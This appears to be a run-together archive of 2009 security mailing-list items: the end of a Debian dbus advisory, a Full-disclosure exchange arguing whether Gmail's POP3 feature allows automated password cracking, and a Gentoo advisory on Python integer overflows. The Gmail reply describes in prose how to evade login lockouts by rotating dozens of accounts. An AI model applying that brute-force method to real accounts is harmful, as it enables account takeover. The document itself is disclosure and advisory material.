For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 1.2.14-1.

We recommend that you upgrade your dbus packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian (oldstable)
------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Re: [Full-disclosure] [ISecAuditors Security Advisories] Gmail vulnerable to automated password cracking
Hi Chris,

cev...@google.com wrote:
> Hi Vicente,
>
> As was explained by my colleague Neel Mehta in his reply, this is not
> a vulnerability.

I must express my disagreement. I consider that if someone can automate the process of password cracking, a security problem exists. I have programmed a Python script that implements the process that I explain in the proof of concept paragraph, and it has allowed me to run thousands of automated requests and obtain the password of one of my test accounts.

> Gmail has all sorts of additional limits on password brute forcing.
> The confusion here is the difference between login incorrect (due to
> bad password) and login incorrect (due to excessive login attempts).
> This protection kicks in after a small number of failed attempts,
> after which even correct credentials will not be accepted.
> You can't tell the difference in the UI you are using, so it's
> understandable to have missed these extra limits.

A malicious user can abuse the feature "Check for mail using POP3" to carry out the automatic process of password cracking. As you comment, when using this feature there is a lock (for 2 hours) on authentication attempts, and beyond this limit (100 requests) the message returned by the application does not allow one to know if the analyzed password is correct or not.

However, every 2 hours an attacker could make 100 authentication attempts. To overcome this limit (100 authentication attempts), it is sufficient that the attacker has other Gmail accounts. Each account allows the malicious user to make 100 new authentication attempts within 2 hours of the blockade.

If the attacker wants to make one authentication attempt per second and to avoid the blockage, then they will need to make 3600 requests per hour. This requires that the malicious user have 3600/100 = 36 Gmail accounts at their disposal.
As there is a blockage of 2 hours, with 72 Gmail accounts the attacker can reuse the initial account (eg accoun...@gmail.com) after finishing the 100 authentication attempts with the last Gmail account (eg accoun...@gmail.com).

I hope that I have clarified the matter.

Best regards,

--
Vicente Aguilera Díaz
Audit Director
CISA, CISSP, ITIL CEH Instructor, ECSP Instructor, CSSLP, OPSA, OPST
OWASP Spain Chapter Leader
vaguil...@isecauditors.com

Internet Security Auditors
www.isecauditors.com
c. Santander, 101. Edif. A. 2º
E-08030 Barcelona (Spain)
Tel: +34 93 305 13 18
Fax: +34 93 278 22 48
Pº. de la Castellana, 164-166. Entlo. 1ª
E-28046 Madrid (Spain)
Tel: +34 91 788 57 78
Fax: +34 91 788 57 01

On Fri, Jul 17, 2009 at 2:48 PM, ISecAuditors Security Advisories <advisor...@isecauditors.com> wrote:
> =============================================
> INTERNET SECURITY AUDITORS ALERT 2009-NNN
> - Original release date: July 7th, 2009
> - Last revised: July 17th, 2009
> - Discovered by: Vicente Aguilera Diaz
> - Severity: 4.5/10 (CVSS Base Score)
> =============================================
>
> I. VULNERABILITY
> -------------------------
> Gmail vulnerable to automated password cracking.
>
> II. BACKGROUND
> -------------------------
> Gmail is Google's free webmail service. It comes with built-in Google
> search technology and over 7,300 megabytes of storage (and growing
> every day). You can keep all your important messages, files and
> pictures forever, use search to quickly and easily find anything
> you're looking for, and make sense of it all with a new way of viewing
> messages as part of conversations.
>
> III. DESCRIPTION
> -------------------------
> An existing abuse of functionality in the Check for mail
[ GLSA 200907-16 ] Python: Integer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200907-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Integer overflows
      Date: July 19, 2009
      Bugs: #246991
        ID: 200907-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows in Python have an unspecified impact.

Background
==========

Python is an interpreted, interactive, object-oriented programming language.

Affected packages
=================

    ---
     Package  /  Vulnerable  /  Unaffected
    ---
  1  dev-lang/python 2.5.4-r2= 2.5.4-r2 *= 2.4.6

Description
===========

Chris Evans reported multiple integer overflows in the expandtabs method, as implemented by (1) the string_expandtabs function in Objects/stringobject.c and (2) the unicode_expandtabs function in Objects/unicodeobject.c.

Impact
======

A remote attacker could exploit these vulnerabilities in Python applications or daemons that pass user-controlled input to vulnerable functions. The security impact is currently unknown but may include the execution of arbitrary code or a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Python 2.5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =dev-lang/python-2.5.4-r2

All Python 2.4 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =dev-lang/python-2.4.6

References
==========

  [ 1 ] CVE-2008-5031
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200907-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5